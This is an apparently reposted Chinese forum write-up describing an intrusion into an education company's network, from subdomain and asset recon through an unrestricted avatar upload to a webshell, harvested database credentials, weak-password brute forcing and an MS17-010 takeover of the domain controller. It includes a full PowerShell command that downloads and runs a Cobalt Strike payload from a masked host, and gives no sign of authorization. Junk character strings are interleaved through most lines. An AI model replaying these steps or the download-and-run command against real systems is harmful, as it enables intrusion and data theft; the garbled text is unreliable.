|
~# H% ]; |" F. G5 v
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路' s# h: c- F! f8 v7 y3 C. {! e. Q
! T6 I5 t0 R/ }8 O
, n6 i; W0 \0 D9 D! t
1 Z8 `& y2 X: _, U: _
. P7 f! }8 }8 R8 Z1 _
8 P- F* D8 f& [, A- v( I" K' f& \ 正文
) E# e: S9 w3 c
% U3 t) b2 M% ?5 Z4 d8 U' k p
: O; ]7 Y p, ?$ c& w+ }" K: Y : k$ y. B8 R4 Y4 S$ `0 k- y3 |$ h
( N8 s0 x( F( \/ j/ J( H/ v+ ]
) }3 ^( N! m1 g 目标:www.xxxx.com(一家教育机构)
1 a1 P# G q! h! e+ W. d打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, D) k7 D- Q" q" p2 b+ z* ]& X
- C' \2 d6 x+ `1 |9 d2 p! y& Q
4 y: }) q' L1 z. P6 h$ ?. L- n
( ~+ B, s% ?- b1 g: D" V 1 |4 X x5 q9 F2 |
' z( [' Q" N! S: N" Q) \0 K8 Y 进行了简单的信息搜集 5 E* d, L) [9 m/ N
# R5 T) L* J! Y- y8 Q
& V$ [: o3 k% o; E9 J4 M8 d9 K: ?
+ S. l! W7 J. F
1 q( m! @/ u. ^0 c- m/ J 子域名搜集1 r% e: ^: `5 @2 y$ q& c
7 b! m* s S0 Q8 B+ ~" i E
+ o" u- @( Y5 [( L $ _9 b! M1 \6 B& z: \& M3 k
9 p& ^& T# R9 D) U* }7 q# P$ }: C. F9 C$ \
fofa找资产 - l8 x* E- B, J) E v; Y4 Q( o, f
1 C0 b0 ~8 a5 X
& E% ~# n" U" p ?9 g" L J1 L ) a; v* s* m% W5 ]: ?8 |5 U5 c. K
/ L0 \& H/ c& u* Z1 H0 l* f
& ^! g- t8 [* `# j
" u6 I. i6 w" o
6 Z% o8 P' [0 P% ? k; ^# w5 h 一共七个资产。去重之后只有两个。 7 D }0 |1 o/ [3 R+ b- ~
3 p0 s1 Y$ C \7 m
: }) k/ |1 u# F9 n9 O
0 w) L# f) X5 H) U2 ~; n9 l
9 E; t# ]$ ^7 k: k, v' B4 K 目录探测
- A" O! M0 N( q0 s7 N9 l
1 X; }4 y- E/ _' L5 H1 e) x
1 ]3 L2 M x5 n) S & H. Z5 ?7 C! F5 A
$ T) {. R) U; c# y* q0 N: y* @6 b" ~6 }+ Z1 N) R
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& m9 Y( P' I: [$ P2 s5 K# a
' A. e8 q3 r o
2 @- w( b% U6 z. k. N6 {$ l
, N' q/ q# C; D& K h
* @( { D: H' E6 g 我又尝试了通过修改返回包来绕过登录界面
9 B# Q# d$ O3 g- m1 ?$ _4 [) C 5 P$ j7 A3 K! V7 H- F
) t# T4 N( H3 C- C* k, G8 P0 T % V5 h$ o' i: w& Z; r) k& a
2 J+ X; h+ K, _1 [6 M
2 @2 g v" k" @$ N$ B- ^3 `9 w$ F% W
还是不行,尝试注入无果
0 R! L8 B" ^. Y1 H x 3 r. j: i3 H3 ^1 j! J+ x
# X( J; F) E J2 _ o2 c% o
/ e6 Q+ W ?+ @
) P; D+ k& Q: e, m
& K4 M! \7 `# z: ?) x1 S9 M
不过我目录探测出了一处Spring信息泄露
3 \% W6 J; E$ d
6 O2 r! _! P* o' @$ i
+ P. U+ X5 n! n+ e' o
: U8 X; e$ D; X
& o$ Q+ n# ?% ?: k 0 e) D" V Q' b/ y* v* [
% Z: r0 F! w0 g* j
" v0 ?; I% |$ X9 S. L 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 R) G( g5 ]- `1 P% [
' A! e! ?/ I7 w3 U, y9 \$ X z6 X5 E
( e3 Y2 N5 H7 D0 R' G
5 j, o) Q3 x+ P0 s
% S/ S0 B( b& s5 p. c( X# J7 A 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
3 K0 _5 U! x* [; M3 O
- Z; H- A8 m. O' V( Z! |
& s- v% t" o9 S0 S5 W
% i$ w/ o6 D2 z$ |" F+ w7 [. _
% l. |* `# g9 m
7 J* [+ Y- a% K+ V9 d! V# ]6 J8 j. P 获取有些师傅到这一步就手机抓包电脑测了。, d* Z! J7 w4 H3 s, |
2 v9 G) t5 H7 \5 I) T
8 q+ Z: T$ N8 t: I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
- m& Z& L2 m5 a. R
, A* m2 X3 v+ `5 T @' i* V% @. B2 _9 ] k1 }3 F# |
其中在一个公众号发现了小程序,可以进行注册。# o8 G& j, j, I x
# \. s: U8 ]6 D" F. M. b r
6 t" b# e% G+ R
看到了头像上传,尝试上传获取WebShell
0 ~/ [7 H; \- Q" {; K- ^0 r- e
( u( E- X4 P m, T. `8 X+ s$ y" f5 q
9 r0 ~1 M% n! i
" m2 O# ^/ \$ q: D$ i- `* X0 ?
" N( Q4 _4 r4 N- R7 b4 b b0 T' @ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
2 t5 l! o% L. W; I6 N6 z3 y 2 @# W! x" `* U2 n& |2 o, I; B% i0 @ A
3 _, O1 |" u% x6 u
}" G M/ q8 J
& M1 w3 T! t0 x2 ~3 B( b* M' u
然后上了大马! c5 ?! [0 j- R9 t) {; i& e
! ]: K' e4 f" t4 j0 R* b8 l' i5 |3 e- D, O. | Q
2 Z4 T/ \$ Z2 H) n 9 A* l1 L& J% g P2 h' {# [6 m
1 G, O( u, Q0 r6 c! V
, j' P( ?+ U+ Q) ~
5 u& p* v$ m) C; r; f! B' Z- o
. _8 ~. Z; n" ?) M; p+ z/ u: B2 l
通过翻找文件发现数据库账号密码* p( i2 K+ _0 u0 k5 t7 \
' G( k' C- D" f' J% o! o; L# R
7 y- P9 n) E) Y0 J
* T* t" H6 ^. u; y9 P3 L
6 f3 p* \; P. Z3 ^
; L3 |/ T1 C [8 G( t2 y; B# [; B --内网渗透0 R9 b- u% u0 ~, ^' L, J
/ I; n4 }$ @; w y- |9 t; O
S/ M" b: c7 R( s. @ 直接通过powershell执行 cs上线+ V$ d; t2 m1 z$ s) J+ t+ D' h
0 O* W! e E; d9 u6 Z4 Y0 V1 Z# y/ X. P+ d8 l7 n
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
9 v6 `4 ?" A. K" w* Z
5 m1 K5 a ^& \0 K3 k) a. {; F$ c3 O7 s
* D! a4 E0 S2 d0 `2 h8 P. z# ?7 y% P
v4 U( M# u r9 H C
) e+ O) |2 P$ b/ [6 }' `0 H
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
' r; s5 w6 A. r/ u
5 L. \( @# t$ U$ c3 ^7 g- N$ a
# F6 L/ t$ j3 C, f
e6 X% J( f/ _2 ~7 t
% l Z* q9 ]4 E X 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 h9 k: m# h/ [* z$ J1 Y
( e% n6 t0 }+ Q 9 q. T. u/ a. l) R
/ I% m, ^9 N- E7 e* x
$ ^* O' I$ f9 F" H& f9 O% z- ?. ]; L8 M/ `& L
/ f6 D; t; M4 k. ?* G) W: S
1 Z& l" [0 U9 W5 Z4 |7 G% L
/ v; L. t/ } A 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* _: t3 z' C( ^: T! R
9 N, N* b6 z4 f- J% s/ p0 B
7 J+ r! C7 S8 ^5 r3 c
S+ ]5 v+ @& w, r! K# l
+ u; Z( {! n A# o* @
5 i! y3 O3 }) E% M' N" i+ G
: a; s& | V% C/ a+ H+ t! V X5 X% p9 |, {0 S
$ s j# Z+ w% b: v" U* @% o% M
( n+ i+ v6 b9 E# x; }# m2 V/ a
. G) C5 P+ D+ J2 o4 J; @7 E) d
; C$ U# @* x1 C& `/ l
% ]' s" v {4 q. q c
* G( \! z8 L4 B/ W
5 e' i) |' K4 a. p
' k" C; ?7 a' @' K 小结
4 p( m0 ^7 D5 k1 s+ ?; v1 \ * C* ]1 l" r* ]/ S L9 _
y5 K" b/ i9 L/ J# `3 l4 C: D# E
0 W- l+ c7 n; C
: L4 W! i: r7 ?
3 i+ I$ I/ v9 e6 Z8 O 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
% D2 G& u: N3 |. b: H, z
" ^. N. ^- z2 ~ ?- s0 Y% k
; [: V; ]; w3 y+ U
# s0 ]7 [% m% \
. W% ?6 ]- Z( ?
4 P( v7 |2 S' t1 d6 H0 X& J -
) I( W% u. ]( B: F $ }9 ~0 }" O; B; t9 y* o
" U9 u, ~% F3 y! A H# O - 0 n3 p" @6 v7 b! j
5 o& K4 b0 o, B
. E3 _6 ?7 q, E/ a
+ \4 k7 m8 Q6 ]5 u
4 Z* J; x, K) @" e. v5 s, t0 @
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html" c3 _4 ]% o9 u! w7 Q2 J7 w% g* L* f
+ Q9 j$ J/ o/ J% f* F) k
- y$ P3 R& P d% w & B6 K& O7 N) W# w$ V: v% d
|